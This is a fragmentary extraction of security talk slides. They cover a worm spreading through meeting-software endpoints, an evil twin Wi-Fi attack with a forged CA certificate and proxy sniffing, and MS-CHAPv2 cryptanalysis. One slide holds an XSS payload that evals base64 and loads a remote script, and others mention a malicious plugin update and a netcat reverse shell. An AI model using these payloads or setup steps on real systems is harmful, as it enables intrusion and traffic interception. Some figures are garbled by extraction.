2. Overview
• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis : MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack
Note: Some Images in this presentation has been taken from web for illustration
3. SilverFish Worm
XSS
NPAPI
runtime
Shell
<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')
masterPlugin.updatePlugin(“attacker-plugin”,success,failure)
Netcat Shell / ssh daemon / Bounjour
Hatching rate = ng
n=Average # of endpoints per meeting
g=# of generation
g=0
g=1
g=2
8. Soft AP
•Put WNIC in Master Mode and use Forged CA cert
•Configure AP SSID to “bjn-int”
•DAUTH to actual AP
Network
•Setup DNS
•Setup DHCP
Routing
•Redirect 80,443 packets to proxy port
•Forward traffic after NAT
Capture
•Use Same CA cert for signing
•Sniff in proxy
Attack Setup
Note: Chrome uses certificate pinning for *.google.com
13. Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(random|| username)[0:8]
ChallengeHash
ChallengeResponse
Note: Original complexity analysis has been done by Moxie Marlinspike
14. Cryptanalysis of MS-CHAPv2
Note: Original complexity analysis has been done by Moxie Marlinspike
7 byte 7 byte 2 byte
Complexity = 256
time < 24 hrs
( 100% success )